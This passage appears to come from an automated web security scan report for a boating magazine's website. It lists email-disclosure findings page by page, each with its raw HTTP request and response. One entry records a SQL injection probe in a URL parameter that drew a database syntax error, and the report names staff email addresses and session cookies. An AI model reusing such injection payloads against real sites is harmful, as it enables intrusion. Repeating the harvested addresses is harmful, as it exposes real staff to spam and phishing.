P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.28. http://www.soundingsonline.com/features/justyesterday  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/justyesterday

Issue detail

The following email addresses were disclosed in the response:

Request

GET /features/justyesterday HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.29. http://www.soundingsonline.com/features/lifestyle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/lifestyle

Issue detail

The following email addresses were disclosed in the response:

Request

GET /features/lifestyle HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.30. http://www.soundingsonline.com/features/profiles  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/profiles

Issue detail

The following email addresses were disclosed in the response:

Request

GET /features/profiles HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.31. http://www.soundingsonline.com/features/technical  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/technical

Issue detail

The following email addresses were disclosed in the response:

Request

GET /features/technical HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.32. http://www.soundingsonline.com/features/type-of-boat  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/type-of-boat

Issue detail

The following email addresses were disclosed in the response:

Request

GET /features/type-of-boat HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.33. http://www.soundingsonline.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:33:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:33:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.34. http://www.soundingsonline.com/more/digital-publications  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/digital-publications

Issue detail

The following email addresses were disclosed in the response:

Request

GET /more/digital-publications HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.35. http://www.soundingsonline.com/more/the-masters-series  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/the-masters-series

Issue detail

The following email addresses were disclosed in the response:

Request

GET /more/the-masters-series HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:c.brayfield@soundingspub.com">c.brayfield@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.36. http://www.soundingsonline.com/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.37. http://www.soundingsonline.com/news/coastwise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/coastwise

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/coastwise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.38. http://www.soundingsonline.com/news/dispatches  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/dispatches

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/dispatches HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.39. http://www.soundingsonline.com/news/home-waters  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/home-waters

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/home-waters HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.40. http://www.soundingsonline.com/news/mishaps-a-rescues  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/mishaps-a-rescues HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:27:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:27:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.41. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; __utmc=1; __utmb=1.1.10.1295961240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D2; s_invisit=true; s_lv=1295961240451; s_lv_s=Less%20than%201%20day; s_sq=%5B%5BB%5D%5D; count=5

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 13:16:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 13:16:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.42. http://www.soundingsonline.com/news/sailing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/sailing

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/sailing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.43. http://www.soundingsonline.com/news/todays-top-stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/todays-top-stories

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/todays-top-stories HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
